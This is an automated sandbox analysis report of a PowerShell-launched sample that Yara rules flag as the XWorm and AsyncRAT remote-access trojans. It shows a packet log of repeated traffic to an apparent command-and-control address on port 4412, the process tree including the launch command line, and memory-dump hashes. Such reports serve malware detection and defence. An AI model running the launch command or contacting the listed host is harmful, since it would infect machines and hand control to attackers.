                                        Jan 26, 2025 10:36:24.404094934 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:34.337131023 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:34.342619896 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:34.555246115 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:34.559336901 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:34.564336061 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:34.993383884 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:34.998528957 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:35.219703913 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:35.221750021 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:35.226773024 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:36.902303934 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:36.946343899 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:46.790302038 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:46.795414925 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:47.007421970 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:47.011389971 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:47.016360998 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:58.590872049 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:58.596406937 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:58.808052063 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:58.809874058 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:58.814994097 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:04.151443005 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:04.156507015 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:04.368257046 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:04.373284101 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:04.378196955 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:06.917681932 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:06.977711916 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:07.212412119 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:07.217536926 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:07.432086945 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:07.434211016 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:07.439559937 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:11.056114912 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:11.061599016 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:11.273257971 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:11.275724888 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:11.280879021 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:22.852962971 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:22.858017921 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:23.070699930 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:23.118339062 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:23.204297066 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:23.209712029 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:31.415563107 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:31.420692921 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:31.509462118 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:31.514764071 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:31.646275043 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:31.648147106 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:31.653599024 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:31.767760038 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:31.769145012 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:31.774019003 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:36.936336040 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:36.977803946 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:43.306102037 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:43.311590910 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:43.523152113 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:43.537689924 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:43.542886972 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:54.146080971 CET497094412192.168.2.5176.113.115.228

                                        Click to jump to process

                                        050100150200s0.0050100150MB

                                        Click to jump to process

                                        • File
                                        • Registry
                                        • Network

                                        Click to dive into process behavior distribution

                                        Target ID:0
                                        Start time:04:34:09
                                        Start date:26/01/2025
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1"
                                        Imagebase:0x7ff7be880000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2378338667.000001DD8F5B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2378338667.000001DD8F5B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        Reputation:high
                                        Has exited:true

                                        Target ID:1
                                        Start time:04:34:09
                                        Start date:26/01/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:04:34:12
                                        Start date:26/01/2025
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                        Imagebase:0xb50000
                                        File size:45'984 bytes
                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4340987484.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:04:34:12
                                        Start date:26/01/2025
                                        Path:C:\Windows\System32\wermgr.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3716" "2640" "2540" "2656" "0" "0" "2660" "0" "0" "0" "0" "0"
                                        Imagebase:0x7ff6070d0000
                                        File size:229'728 bytes
                                        MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:11
                                        Start time:04:37:43
                                        Start date:26/01/2025
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 880
                                        Imagebase:0x590000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Executed Functions

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2406610196.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff849000000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1694cd04b55a3c645837493ec108ab761839ccb8b3f48b0161491bd36278cb79
                                        • Instruction ID: 23d478ea69635a76cf917d25c46fbcc22d9003dee7a8bffe0da4a2f62f269ac6
                                        • Opcode Fuzzy Hash: 1694cd04b55a3c645837493ec108ab761839ccb8b3f48b0161491bd36278cb79
                                        • Instruction Fuzzy Hash: FEE21531E0DBC94FEBA6AF2868555B57FE1EF56254B0801FBD04DC7193EA18AC06C392
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2406111931.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f96ea6287c42c0ac51f0a8fce4a632221cff249f02aa90f17881d32513b9eb32
                                        • Instruction ID: a66488df16d0694401b7cc63625c3fdeb18fca6013c03a40820afd3d73a9bbe1
                                        • Opcode Fuzzy Hash: f96ea6287c42c0ac51f0a8fce4a632221cff249f02aa90f17881d32513b9eb32
                                        • Instruction Fuzzy Hash: 5A315930A08A0D8FDB98EF58C4446EE73F2FF98351F10457AE40AE7294CB39A855CB84
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2406610196.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff849000000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e51837b7727b7fd963c900b9b47a5e8c357caebd6cf62019112d63fa93630f60
                                        • Instruction ID: c35af12eaf732f9265b1527afffba5f0350b48643753d14465cb87ba3e105ac7
                                        • Opcode Fuzzy Hash: e51837b7727b7fd963c900b9b47a5e8c357caebd6cf62019112d63fa93630f60
                                        • Instruction Fuzzy Hash: 14114C7140E7C98FDB679F3868292A57F70FF17200F0905EAD0C88B4A3DA29A959C752
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2406111931.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2406111931.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2406610196.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff849000000_powershell.jbxd
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2406111931.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

                                        Executed Functions

                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0150811A), ref: 01508207
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4340575754.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_1500000_RegSvcs.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0150811A), ref: 01508207
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4340575754.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_1500000_RegSvcs.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0